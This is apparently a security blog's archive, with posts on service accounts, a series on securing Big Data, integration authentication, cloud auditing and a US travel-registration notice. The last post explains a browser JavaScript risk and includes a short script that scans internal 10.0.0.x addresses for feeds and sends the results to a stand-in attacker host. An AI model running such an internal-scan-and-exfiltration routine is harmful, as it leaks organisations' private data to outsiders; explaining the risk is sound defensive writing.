
Thursday, September 17, 2020

Service Accounts suck - why data futures require end to end authentication.

Can we all agree that "service" accounts suck from a security perspective? Those are the accounts that you set up so that one system/service can talk to another. Often this will be a database connection, so the application uses one account (and thus one connection pool) to access the database. These service accounts are sometimes unique to a service or application, but often it's a standard service account for anything that needs to connect to a system.

The problem with that is that you've got security defined at the service account level, not based on the users actually using it. So if that database contains the personal information of every customer then you are relying on the application to ensure that it only displays the information for a given customer; the security isn't with the data, it's with the application.

Back in 2003 a group called the "Jericho Forum" was set up under The Open Group to look at the infrastructural challenges of de-perimeterisation, and they created a set of commandments, the first of which is:
The scope and level of protection should be specific and appropriate to the asset at risk. 

Service accounts break this commandment: they take the most valuable asset (the data) and effectively remove its security scope, placing it in the application. What needs to happen is that the original requestor of the information is authenticated at all levels, as with OAuth, so that if I'm only allowed to see my data then, even if someone makes an error in the application code or I run a Bobby Tables attack, my "Select *" only returns my records.
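
To make that concrete, here is a minimal sketch of authenticating the original requestor at the data layer, assuming PostgreSQL row-level security and the psycopg2 driver; the table, policy and setting names are illustrative assumptions, not a prescribed implementation.

```python
# Sketch: pass the real user's identity down to the database so row
# filtering happens at the data layer, not in application code.
# Assumes PostgreSQL row-level security (RLS); all names are illustrative.
import psycopg2

def fetch_my_records(user_id):
    conn = psycopg2.connect("dbname=crm")  # connections can still be pooled
    with conn, conn.cursor() as cur:
        # Tell the database who the original requestor is for this session.
        cur.execute("SELECT set_config('app.current_user', %s, false)",
                    (user_id,))
        # With RLS enabled and a policy such as:
        #   CREATE POLICY own_rows ON customers
        #     USING (owner_id = current_setting('app.current_user'));
        # even a blanket "SELECT *" only returns this user's rows.
        cur.execute("SELECT * FROM customers")
        return cur.fetchall()
```

The filter now lives with the data: an application bug or an injected query still only sees the requestor's own records.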

This changes a lot of things, connection pooling for starters, but when you are looking at reporting in particular we have to get away from technologies that force system accounts and therefore require multiple security models to be implemented within the consumption layer.

The appropriate level to protect data is at the data level, and the scope is with the data. Only by shifting our perception of data, from being about service accounts and databases to data itself being the asset, can we start building security models that actually secure data as an asset.

Today most data technologies assume service accounts, which means most data technologies don't treat data as an asset. This has to change.

Thursday, January 15, 2015

Securing Big Data - Part 7 - a summary

Over six parts I've gone through a bit of a journey on what Big Data Security is all about.
  1. Securing Big Data is about layers
  2. Use the power of Big Data to secure Big Data
  3. How maths and machine learning helps
  4. Why it's how you alert that matters
  5. Why Information Security is part of Information Governance
  6. Classifying Risk and the importance of Meta-Data
The fundamental point here is that encryption and ACLs provide only a basic hygiene factor when it comes to securing Big Data. The risk and value of information are increasing, and by creating Big Data solutions businesses are creating more valuable, and therefore more at-risk, information solutions. This means that Information Security needs to become a fundamental part of Information Governance, and that new ways of securing that information are required.

This is where Big Data comes to its own rescue: large data sets enable new generations of algorithms to identify issues and then alert based on the risk and the right way to handle it. All of this requires you to consider Information Security as a core part of the Meta-data that is captured and governed around information.

The time to start thinking, planning and acting on Information Security is now. It's not when you become the next Target, or when one of your employees becomes your own personal Edward Snowden; it's now, and it's about having a business practice and approach that considers information as a valuable asset and secures it in the same way as other assets in a business are secured.

Big Data Security is a new generation of challenges and a new generation of risks; these require a new generation of solutions and a new corporate culture where information security isn't just left to a few people in the IT department.

Tuesday, January 13, 2015

Securing Big Data Part 6 - Classifying risk

Now that your Information Governance group considers Information Security to be important, you have to think about how it should classify risk. There are documents out there that talk about frameworks for this. British Columbia's government has one, for instance, that talks about High, Medium and Low risk, but for me that misses the point and over-simplifies the problem, which ends up complicating implementation and operational decisions.

In a Big Data world it's not simply about the risk of an individual piece of information, it's about the risk in context. So the first stage of classification is "what is the risk of this information on its own?"; it's that sort of classification that the BC Government framework helps you with. There are some pieces of information (the Australian Tax File Number, for instance) whose corporate risk is high just as an individual piece of information. The Australian TFN has special handling rules and significant fines if handled incorrectly. This means it's well beyond "Personal Identification Information", which many companies consider to be the highest level. So at this level I'd recommend having five risk statuses:

  1. Special Risk - Specific legislation and fines apply to this piece of information
  2. High - losing this information has corporate reputation and financial risk
  3. Medium - losing this information can impact corporate competitiveness
  3. Low - losing this information has minimal corporate risk
  5. Public - the information is already public
The point here is that this is about information as a single entity: a personal address, a business registration, etc. That is only the first stage when considering risk.

The next stage is considering the Direct Aggregation Risk: what happens when you combine two pieces of information, does that change the risk? The categories remain the same but here we are looking at other elements. So for instance address information would be low risk or public, but when combined with a person that link becomes higher risk. Corporate information on sales might be medium risk, but when tied to specific companies or revenue it could become a bigger risk. At this stage you also need to look at the policy for allowing information to be combined, and you don't want an "always no" policy.

So what if someone wants to combine personal information with Twitter information to get personal preferences? Is that allowed? What is the policy for getting approval for new aggregations, how quickly is risk assessed, and is business work allowed to continue while the risk is assessed? When looking at Direct Aggregation you are often looking at where the new value will come from in Big Data, so you cannot just prevent that value being created. So set up clear boundaries for where approval is required up front (combining PII with new sources requires approval, for instance) and where you can get approval after the fact (sales data with anything is OK; we'll approve at the next quarterly meeting or modify policy).

The final stage is the most complex: the Indirect Aggregation Risk. This is the risk where two sets of aggregated results are combined and, though independently they are not high risk, pulling that information together constitutes a higher-level risk. The answer here is actually to simplify the problem and consider aggregations not just as aggregations but as information sources in their own right.

This brings us to the final challenge in all this classification: Where do you record the risk?

Well, this is just meta-data, but that is often the area that companies spend the least time thinking about. When looking at massive amounts of data, and particularly disparate data sources and their results, Meta-Data becomes key to Big Data. But let's look at just the security side for the moment.


| Data | Type | Direct Risk |
| --- | --- | --- |
| Customer | Collection | Medium |
| Tax File Number | Field | Special |
| Twitter Feed | Collection | Public |

and for Aggregations

| Source 1 | Source 2 | Source 3 | Source 4 | Aggregation Name | Aggregation Risk |
| --- | --- | --- | --- | --- | --- |
| Customer | Address | Invoice | Payments | Outstanding Consumer Debt | High |
| Customer | Twitter | Location | | Customer Locations | Medium |
| Organization | Address | Invoice | Payments | Outstanding Company Debt | Low |


The point here is that you really need to start thinking about how you automate this and what tools you need. In a Big Data world the heart of security is being able to classify the risk and having that inform the Big Data anomaly detection, so you can inform the right people and manage the risk.
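
To make the automation point concrete, here is a minimal sketch of risk metadata in code; the risk levels come from the list above, while the names, the max-of-sources default and the override mechanism are illustrative assumptions rather than a prescribed tool.

```python
# Sketch: machine-readable risk metadata for sources and aggregations.
# Risk levels follow the classification above; everything else is illustrative.
from enum import IntEnum

class Risk(IntEnum):
    PUBLIC = 0
    LOW = 1
    MEDIUM = 2
    HIGH = 3
    SPECIAL = 4

# Direct risk metadata, mirroring the first table above.
DIRECT_RISK = {
    "Customer": Risk.MEDIUM,
    "Tax File Number": Risk.SPECIAL,
    "Twitter Feed": Risk.PUBLIC,
}

def aggregation_risk(sources, override=None):
    """Default an aggregation to its riskiest source, unless the
    governance group has assessed and overridden it."""
    if override is not None:
        return override
    return max(DIRECT_RISK.get(s, Risk.LOW) for s in sources)

# Treating an approved aggregation as a source in its own right is what
# makes the Indirect Aggregation Risk tractable.
DIRECT_RISK["Customer Locations"] = aggregation_risk(
    ["Customer", "Twitter Feed"], override=Risk.MEDIUM)
```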

This gives us the next piece of classification that is required, which is about understanding who gets informed when there is an information breach. This is a core part of the Information Governance and classification approach, because it's here that the business needs to say "I'm interested when that specific risk is triggered". This is another piece of Meta-data, and one that then tells the Big Data security algorithms who should be alerted.

If classification isn't part of your Information Governance group, or indeed you don't even have a business-centric IG group, then you really don't consider either information or its security to be important.

Other Parts in the series
  1. Securing Big Data is about layers
  2. Use the power of Big Data to secure Big Data
  3. How maths and machine learning helps
  4. Why it's how you alert that matters
  5. Why Information Security is part of Information Governance

Monday, January 12, 2015

Securing Big Data Part 5 - your Big Data Security team

What does your security team look like today?

Or the IT equivalent, "the folks that say no". The point is that in most companies information security isn't actually considered important. How do I know this? Well, because basically most IT Security teams are the equivalent of nightclub bouncers: they aren't the people who own the club, they aren't as important as the barman, certainly not as important as the DJ, and in terms of nightclub strategy their only input will be on the ropes being set up outside the club.

If information is actually important then information security is much more than a bunch of bouncers trying to keep undesirables out. It's about the practice of information security and the education around it; in this view, information security is actually a core part of Information Governance, and Information Governance is very much a business-led thing.

Big Data increases the risks of information loss because fundamentally you are not only storing more information, you are centralizing more information, which means more inferences can be made, more links made and more data stolen. This means that historical thefts, which stole data from a small number of systems, risk being dwarfed by Big Data hacks which steal huge sets or even run algorithms within a data lake and steal the results.

So when looking at Big Data security you need to split governance into three core groups, listed below.
The point here is that this governance is exactly the same as your normal data governance; it's essential that Information Security becomes a foundation element of information governance. The three different parts of governance are set up because there are different focuses:

  1. Standards - sets the gold standard of what should be achieved
  2. Policy - sets what can be achieved right now (which may not meet the gold standard)
  3. KPI Management - tracks compliance to the gold standard and adherence to policy
The reason these are not just a single group is that the motivations are different. Standards groups set out what would be ideal; it's against this ideal that progress can be tracked. If you combine Standards groups with Policy groups you end up with Standards which are 'the best we can do right now', which doesn't give you something to track towards over multiple years.

KPI management is there to keep people honest. This is the same sort of model I talked about around SOA Governance, and it's the same sort of model that whole countries use, so it tends to surprise me when people don't understand the importance of standards vs policy and the importance of tracking and judging compliance independently from those executing.

So your Big Data Security team starts and ends with the Information Governance team; if information security isn't a key focus for that team then you aren't considering information as important and you aren't worried about information security.


Other Parts in the series
  1. Securing Big Data is about layers
  2. Use the power of Big Data to secure Big Data
  3. How maths and machine learning helps
  4. Why it's how you alert that matters

Friday, January 09, 2015

Securing Big Data - Part 4 - Not crying Wolf.

In the first three parts of this series I talked about how securing Big Data is about layers, how you need to use the power of Big Data to secure Big Data, and how maths and machine learning help to identify what is reasonable and what is anomalous.

The Target credit card hack highlights this problem. Alerts were raised, lights did flash. The problem was that so many lights flashed and so many alarms normally went off that people didn't know how to separate the important from the noise. This is where many complex analytics approaches have historically failed: they've not shown people what to do.

If you want a great example of IT's normal approach to this problem, look at the Ethernet port.
What does the colour yellow normally mean? It's a warning colour, so something that flashes yellow would be bad, right? Nope, it just means that a packet has been detected... er, but doesn't the green light already mean that it's connected? Well yes, but that isn't the point; if you are looking at a specific problem then the yellow NOT flashing is really an issue... so yellow flashing is good, yellow NOT flashing is bad...

Doesn't really make sense, does it? It's not a natural way to alert. There are good technical reasons to do it that way (it's easier technically) but that doesn't actually help people.

With security this problem becomes amplified, and it is often made worse by centralising reactions to a security team which knows security but doesn't know the business context. The challenge therefore is to categorize the type of issue and have a different mechanism for each one. Broadly these risks split into four groups: IT operations issues, Line of Business risks, enterprise-wide IT security risks and corporate risk issues.
It's important when looking at risks around Big Data to understand which group a risk falls into, which then indicates the right way to alert. It's also important to recognize that as information becomes available an incident may escalate between groups.

So let's take an example. A router indicates that it's receiving strange external traffic. This is an IT operations problem and it needs to be handled by the group in IT ops which deals with router traffic. Then the Big Data security detection algorithms link that router issue to the access of sales information from the CRM system. This escalates the problem to the LoB level; it's now a business challenge, and the question becomes a business decision on how to cut or limit access. The Sales Director may choose to cut all access to the CRM system rather than risk losing the information, or may consider it a minor business risk when lined up against closing the current quarter. The point is that the information is presented in a business context, highlighting the information at risk so a business decision can be taken.

Now let's suppose that the Big Data algorithms link the router traffic to a broader set of attacks on the internal network, a snooping hack. This is where the Chief Information Security Officer comes in; that person needs to decide how to handle this broad-ranging IT attack. Do they shut down the routers and cut the company off from the world? Do they start dropping and patching, and do they alert law enforcement?

Finally the Big Data algorithms find that credit card data is at risk. Suddenly this becomes a corporate reputation risk issue and needs to go to the Chief Risk Officer (or the CFO if they hold that role) to take the pretty dramatic decisions that need to be made when a major cyber attack is underway.

The point here, though, is that how an issue is highlighted and escalated needs to be systematic; it can't all go through a central team. The CRO needs to be automatically informed when the risk is sufficient, but only be informed then. If it's a significant IT risk then it's the job of the CISO to inform the CRO, not for every single risk to be highlighted to the CRO as if they need to deal with them.

The basic rule is simple: "Does the person seeing this alert care about this issue? Does the person seeing this alert have the authority to do something about this issue? and finally: does the person seeing this alert have someone lower in their reporting chain who answers 'yes' to those questions?"

If you answer "Yes, Yes, No" then you've found the right level and need to concentrate on the mechanism. If it's "Yes, Yes, Yes" then you are in fact cluttering: you are showing them everything that every person in their reporting tree handles as part of their job.
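
As a sketch of how that rule might be automated, the following walks a reporting tree and returns the lowest person who answers "Yes, Yes" with nobody below them who also does; the org structure and issue types are illustrative assumptions.

```python
# Sketch: route an alert using the "Yes, Yes, No" rule described above.
from dataclasses import dataclass, field

@dataclass
class Person:
    name: str
    cares_about: set = field(default_factory=set)   # issues they care about
    can_act_on: set = field(default_factory=set)    # issues they can act on
    reports: list = field(default_factory=list)     # direct reports

def route_alert(person, issue):
    """Prefer someone lower in the reporting chain who cares and has
    authority; only fall back to this person if nobody below qualifies."""
    for report in person.reports:
        target = route_alert(report, issue)
        if target is not None:
            return target
    if issue in person.cares_about and issue in person.can_act_on:
        return person
    return None

ops = Person("router ops", {"router_traffic"}, {"router_traffic"})
ciso = Person("CISO", {"router_traffic", "network_attack"},
              {"router_traffic", "network_attack"}, [ops])
print(route_alert(ciso, "router_traffic").name)  # router ops, not the CISO
print(route_alert(ciso, "network_attack").name)  # escalates to the CISO
```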

In terms of the mechanism it's important to think of that "flashing yellow light" on the Ethernet port. If something is OK then "green is good"; if it's an administrative issue (patch level on a router) then it needs to be flagged into the tasks to be done. If it's an active and live issue it needs to come front and center.

In terms of your effort when securing Big Data, you should be putting more effort into how you react than into almost any other stage in the chain. If you get the last part wrong then you lose all the value of the former stages. This means you need to look at how people work and what mechanisms they use. Should the CRO be alerted via a website they have to go to, or via an SMS to the mobile they carry around all the time that takes them to a mobile application on that same device? (Hint: it's not the former.)

This is the area where I see the least effort made and the most mistakes being made, mistakes that normally amount to "crying wolf": showing every single thing and expecting people to filter out thousands of minor issues and magically find the things that matter.

Target showed that this doesn't work.



Thursday, January 08, 2015

Securing Big Data - Part 3 - Security through Maths

In the first two parts of this series I talked about how securing Big Data is about layers, and then about how you need to use the power of Big Data to secure Big Data. The next part is "what do you do with all that data?". This is where Machine Learning and mathematics come in; in other words, it's about how you use Big Data analytics to secure Big Data.

What you want to do is build up a picture of what represents reasonable behaviour; that is why you want all of that history and range of information. It's the full set of that, across not single actions but millions of actions and interactions, that builds the picture of reasonable. It's reasonable for a sys-admin to access a system; it's not reasonable for them to download classified information to a USB stick.

A single request is something you control using an ACL, but that doesn't include the context of the request (it's 11pm, why is someone accessing that information that late at all?).

You also need to look at the aggregated requests: they've looked at next quarter's sales forecast while also browsing external job-hunting sites and typing up a resignation letter.

Then you need to look at the history of that: oh, it's normal for someone to be doing that at quarter end, all the sales people tend to do that.

This gives us the behaviour model for those requests which leads to us understanding what is considered reasonable.  From reasonable we can then identify anomalous behaviour (behaviour that isn't reasonable).

No human-defined and managed system can handle this amount of information, but Machine Learning algorithms just chomp up this sort of data and create the models for you. This isn't a trivial task, and it's certainly massively more complex than the sorts of ACLs, encryption criteria and basic security policies that IT is used to. These algorithms need tending, they need tuning and they need monitoring.

Choosing the right type of algorithms (and there are LOTS of different choices) is where Data Scientists come in, they can not only select the right type of algorithm but also tune and tend it so it produces the most effective set of results consistently.
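
For a flavour of what such an algorithm looks like, here is a minimal sketch of anomaly detection over access-log features using an Isolation Forest from scikit-learn; the feature names, values and contamination rate are illustrative assumptions, and a real deployment needs exactly the tuning and tending described above.

```python
# Sketch: learn "reasonable" from access-log features, flag the anomalous.
# Assumes scikit-learn and pandas; the data here is illustrative.
import pandas as pd
from sklearn.ensemble import IsolationForest

logs = pd.DataFrame({
    "hour_of_day":     [9, 10, 11, 14, 23, 10, 9, 3],
    "mb_downloaded":   [2, 5, 1, 3, 900, 4, 2, 1200],
    "distinct_tables": [1, 2, 1, 1, 40, 2, 1, 55],
    "reqs_last_hour":  [3, 8, 2, 5, 300, 6, 4, 410],
})

# contamination is set high only because this sample is tiny.
model = IsolationForest(contamination=0.25, random_state=42)
model.fit(logs)                          # build the picture of "reasonable"

flags = model.predict(logs)              # -1 = anomalous, 1 = reasonable
scores = model.decision_function(logs)   # lower = more anomalous
for row, flag, score in zip(logs.itertuples(index=False), flags, scores):
    if flag == -1:
        print(f"anomalous access: {row} (score={score:.3f})")
```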

What this gives you, however, is business-centric security, that is, security that looks at how a business operates. Anomalous Behaviour Detection therefore represents the way to secure Big Data by using Big Data.

The final challenge is then on how to alert people so they actually react.

Wednesday, January 07, 2015

Securing Big Data - Part 2 - understanding the data required to secure it

In the first part of Securing Big Data I talked about the two different types of security: the traditional IT and ACL security that needs to be done to match traditional solutions with an RDBMS. But that is pretty much where those systems stop in terms of security, which means they don't address the real threats out there, which are to do with cyber attacks and social engineering. An ACL is only any good if people do what they are expected to do. Both the Target credit card hack and the NSA hack by Edward Snowden involved some sort of insider breach, so ACL approaches were part of the problem, not the solution.

With Big Data and Hadoop we have another option: to actually use Hadoop to secure the information in Hadoop.  This means getting more information into Hadoop, particularly network and machine log information.

So why do you need all this information? Well, obviously you need to know the access requests and what data is accessed, but you also need to know where the network packets go. Are they going to a normal desktop or corporate laptop, or do they head out of the company and onto the internet? Does the machine that is downloading information have a USB drive plugged in, with the files being copied to it? Is there a person logged into the machine or is it just a headless workstation?

The point here is that when looking at securing Big Data you need to take a Big Data view of security.  This means going well beyond traditional RDBMS approaches and not building a separate security silo but instead looking at the information, adding in information about how it is accessed and information about where that is accessed from and how.
This information builds up a single-request view, but by storing that information you can start building up a profile to understand what other information has been requested and how that matches or can be linked. Thus if someone makes 100 individual requests that on their own are OK but taken in aggregate represent a threat, then it's the storage of that history of requests that gives you the security.
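
A minimal sketch of that idea, assuming request-log entries carry a user, a timestamp and a row count; the field names and the threshold are illustrative assumptions.

```python
# Sketch: individually-fine requests that add up to a bulk extraction.
from collections import defaultdict
from datetime import timedelta

ROWS_PER_DAY_LIMIT = 100_000  # hypothetical per-user baseline

def flag_aggregate_threats(request_log, now, window=timedelta(days=1)):
    """Each request may pass its ACL check; flag users whose requests
    within the window add up to a bulk extraction."""
    totals = defaultdict(int)
    cutoff = now - window
    for req in request_log:  # req: {"user": ..., "ts": ..., "rows": ...}
        if req["ts"] >= cutoff:
            totals[req["user"]] += req["rows"]
    return {user: n for user, n in totals.items() if n > ROWS_PER_DAY_LIMIT}
```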

So to secure Big Data we don't need to just look at individual requests, the ACL model; we need to start building up the broad picture of how the information is accessed, what context it is accessed within and where that information ends up. Securing Big Data, or in reality any data, is about looking at the business context rather than the technical focus of encryption and ACLs, which are simply hygiene factors.

Tuesday, January 06, 2015

Securing Big Data - Part 1

As Big Data and its technologies such as Hadoop head deeper into the enterprise so questions around compliance and security rear their heads.

The first interesting point in this is that it shows the approach to security that many of the Silicon Valley companies that use Hadoop at scale have taken, namely pretty little really. Protecting information clearly hasn't been seen as a massively important thing, as there just aren't the basic pieces within Hadoop to do it. It's not something that has been designed to be secure from day one; it's designed to be easy to use and to do a job. It's as governments and enterprises with compliance departments begin to look at Hadoop that these requirements are really surfacing.

But I'm not going to talk about the encryption and tokenization solutions. Those are hygiene factors but not really about securing the information, because it's still going to be accessible to people with the right permissions, and because of that it's still at risk from cyber or social engineering attacks. This means that security for Big Data is about layering, and really it's about two different ways of viewing security.

IT solutions, technical solutions, can really help around access control and encryption, but they don't really help you to actually prevent information being stolen. What stops information leaking is the business decisions you make.

The first one of those is: what information do I actually store? So you might decide that you'll just store IDs for customer information in Hadoop and then use a more traditional store to provide the cross-reference of IDs back to customer information when it's required.
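
A minimal sketch of that ID-only pattern, assuming a separate, locked-down store holds the ID-to-customer cross-reference; the class and field names are illustrative assumptions.

```python
# Sketch: only opaque IDs go into Hadoop; the cross-reference back to
# customer details lives in a separate, tightly controlled store.
import uuid

class TokenVault:
    """Stands in for the traditional, locked-down cross-reference store."""
    def __init__(self):
        self._by_token = {}

    def tokenize(self, customer_record):
        token = str(uuid.uuid4())
        self._by_token[token] = customer_record
        return token  # only this opaque ID is stored in Hadoop

    def resolve(self, token):
        return self._by_token[token]  # requires access to the vault

vault = TokenVault()
hadoop_row = {"customer_id": vault.tokenize({"name": "Jane Doe"}),
              "purchase": "laptop", "amount": 999}
```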

Above this, however, is actually using Hadoop to protect Hadoop. What is Hadoop? It's a Big Data analytics platform. What is the biggest threat around data? Social engineering or cyber 'inside the walls' attacks. So the first stage in securing Hadoop is to do the IT basics, but the next stage of securing the business of information is about using the power of Hadoop to secure the information stored within it.

Tuesday, January 07, 2014

How integration guys created a data security nightmare

There has been a policy in integration that has stored up a really great data security challenge, and by great I don't mean 'fantastic', I mean 'aw crap'. It's a policy that was adopted for the best of reasons and one that will in future represent a growing challenge to Big Data and federated information.

The policy can be described as this:
Users authenticate with Apps, Apps authenticate with the database and Apps authenticate with the ESB/EAI/Integration
What this means is that users don't authenticate against any of the federated data. This is normally glossed over by saying that 'the source application is responsible for filtering', but the reality is that applications rarely do this terribly well. Put it this way: most of the time when a front-end banking system accesses your account information, the only reason it's getting your account data is because of the account ID it has; if for some reason it had the wrong account ID stored then it would display something else, even though that information isn't yours.

This approach has tended to work for operational systems because they work in linear ways on data sets: you know what you are showing and you pull out what you want to show. The trouble is that as these federated sets are shifted into next-generation Big Data solutions, or accessed in a federated query, the security model completely breaks down, because application-to-application security doesn't recognise the individual actually making the request.

So now we have a world where the data sources don't do data security and privacy 'by design', they do it 'by functionality'. The reason you get your account information is because of that magic ID, but there is nothing stopping a piece of code saying 'return account information for account ID, account ID + 1 and account ID + 3'. It's just practice that stops that, rather than a fundamental information security approach.
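
A minimal sketch of that gap; the schema and query style are illustrative assumptions, and the second function assumes the end user's identity has actually been propagated down to the data layer.

```python
# Sketch: with app-to-app auth the database trusts the application's
# service account, so nothing below the app stops this kind of query.
def get_accounts_insecure(db, account_id):
    # Only practice stops the "+1, +3" fishing trip described above.
    ids = (account_id, account_id + 1, account_id + 3)
    return db.execute(
        "SELECT * FROM accounts WHERE account_id IN (?, ?, ?)", ids)

# With the requesting user's identity carried to the data layer,
# ownership is checked where the data lives, not left to app code.
def get_account_secure(db, authenticated_user, account_id):
    return db.execute(
        "SELECT * FROM accounts WHERE account_id = ? AND owner = ?",
        (account_id, authenticated_user))
```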

There are mechanisms that can help with this, but historically they've been more pain than they're worth. It's going to be interesting seeing how the next generation of joined-up analytics and operational IT estates will retrofit user- and role-level analytical security into a world of application-to-application authentication.

Friday, April 10, 2009

You stole my flashing lights

"I don't understand the hardware, I don't understand the software, but I can see the flashing lights"

This sums up the basic problem with cloud adoption, and over the last week or so it's become even clearer while chatting with some clients and journalists about the issues of cloud.

Simply put, the current regulatory, compliance and security world is basically based around that statement.

Security folks don't understand what your application does, but they understand networks. Networks are physical things; they understand SSO, VLANs and physical LANs, and they love physical separation as it's obvious how the security is maintained.

Accountancy folks don't understand any of this, but they can look at the data centre, count the flashing lights and know all is good. They can also "audit" this physical environment and feel happily secure that the flashing lights are kept safe by a good bunch of processes that make sure the flashing lights don't talk to the wrong flashing lights.

Lawyers are held back by the legal lag that in many cases appears to struggle with the idea of the computer and digital information, let alone the concept of the internet and cloud computing. Again it's about the physical separation, as this is what makes it easiest.

Hardware manufacturers play to the flashing-light meme as well. I was in a DC recently and made a comment about the compliance challenges and how people seem to like flashing lights, and the chap said "Good point, I mean we even put them on the BOARDS for some reason, and in a rack you can't even see those lights".

This is the world that cloud computing really comes up against. Worries that "one virtual machine could break into another one on the same processor", concerns that virtual separation is just like stabbing a condom with holes, and concerns that, because you can't physically audit the separation and some of the cloud providers won't allow you to stomp around their data centres, everything is in fact insecure.

Before FUDmeisters jump up and scream about "being safe", let me ask you this... when was the last time you demanded a third-party audit of your electricity supplier to prove that they wouldn't blast you with 300MV at 1MA? When was the last time you asked for a third-party audit of your telco provider to prove they were not eavesdropping on your calls? What about the postal service or delivery company that ships your packages?

IT is of course completely and utterly different... or is it just that people have been beguiled by the flashing lights and the physicality, and don't want to recognise the new challenges that they really should be addressing? Armadillo security (hard on the outside, soft on the inside) has long been a flaw in many company security approaches, and virtualisation just makes that approach more obviously flawed. Approaches like Jericho aim to address the problems of business interaction.

The larger challenge, however, is in the audit and legal areas. Being blunt, many of the rules laid down today by legislators or auditors are based on a mid-90s level of understanding and have no hope of applying to the new distributed IT environments. Take the need for an independent third-party audit of a cloud provider's data centres, including how they provision, manage security and ensure availability. The problem is that IT is treated not as a utility, which is what cloud aims for, but as a physical asset that must be proven in the same way as oil reserves or cash.

The shift to treating IT as a utility needs to overcome these legal, accountancy and security objections, and those of the internal IT department. But to be clear, these objections are already being worked around and in time will be overcome. The four FUDmeisters of the cloudpocalypse will lose this battle over time, but the quicker the regulatory and accountancy rules are changed to recognise the shift of IT into a utility, the better.

They can't have the flashing lights, and they need to deal with their loss.





Thursday, November 06, 2008

Can the US Government now hack my computer?

Okay, so I've decided (for once) to get ahead of the game and register with the new big brother system that will allow me to travel into the US, something that you now have to do in advance.

The warning popup is quite a sight:
This Department of Homeland Security (DHS) computer system and any related equipment is subject to monitoring for administrative oversight, law enforcement, criminal investigative purposes, inquiries into alleged wrongdoing or misuse, and to ensure proper performance of applicable security features and procedures. As part of this monitoring, DHS may acquire, access, retain, intercept, capture, retrieve, record, read, inspect, analyze, audit, copy and disclose any information processed, transmitted, received, communicated, and stored within the computer system. If monitoring reveals possible misuse or criminal activity, notice of such may be provided to appropriate supervisory personnel and law enforcement officials. DHS may conduct these activities in any manner without further notice. By clicking OK below or by using this system, you consent to the terms set forth in this notice.


The highlight is mine. Does this mean that in order to go to the US I must allow the US government to hack my computer?

The other good bit is that the dialogue only has an OK button; you can't even cancel and get out.

I just thought "you can't do that", then suddenly remembered what the response would be: "yes we can".


Friday, June 08, 2007

How to use Javascript to circumvent security

One of the things that I've found playing around with Google gadgets and Javascript recently is that these XML libraries very helpfully enable you to pull down XML content from pretty much any site you like. I found this out by accident while playing with the Yahoo libraries and some external software to see if I could pull stuff from my internal machine and put it out onto the external ones. I could.

Now what this means is that with a bit of basic coding, maybe something as simple as doing a loop on http://10.0.0.1/feed and just upping the IP address, you might be able to get hold of internal feeds and then submit that content externally. Because the JavaScript is living in the browser there is no security around the retrieval or submission: the user's SSO will get them internal access, and they are already sorted on their company proxy.
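
A minimal sketch of that loop, written here in Python for readability; in the scenario described it would run as JavaScript inside the victim's browser, riding their SSO session and proxy access. All addresses and URLs are illustrative assumptions.

```python
# Sketch: scan a private address range for feeds and push any hits out.
import urllib.request

def scan_internal_feeds(exfil_url="https://attacker.example/collect"):
    for host in range(1, 255):  # "just upping the ip address"
        feed_url = f"http://10.0.0.{host}/feed"
        try:
            with urllib.request.urlopen(feed_url, timeout=1) as resp:
                body = resp.read()
        except OSError:
            continue  # nothing listening, move on
        # Submit whatever was found to an external collection point.
        urllib.request.urlopen(exfil_url, data=body)
```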

As more platforms support "standard" RSS & Atom feeds, which have standard URI names, such hunt-and-find techniques will become much more effective; and because you can use a remote script-load approach, you can keep your cracking script up to date based on what is working and what is not.

IBM have a good article that goes into the challenges of javascript (and the script tag) and security and what this means for mashups.
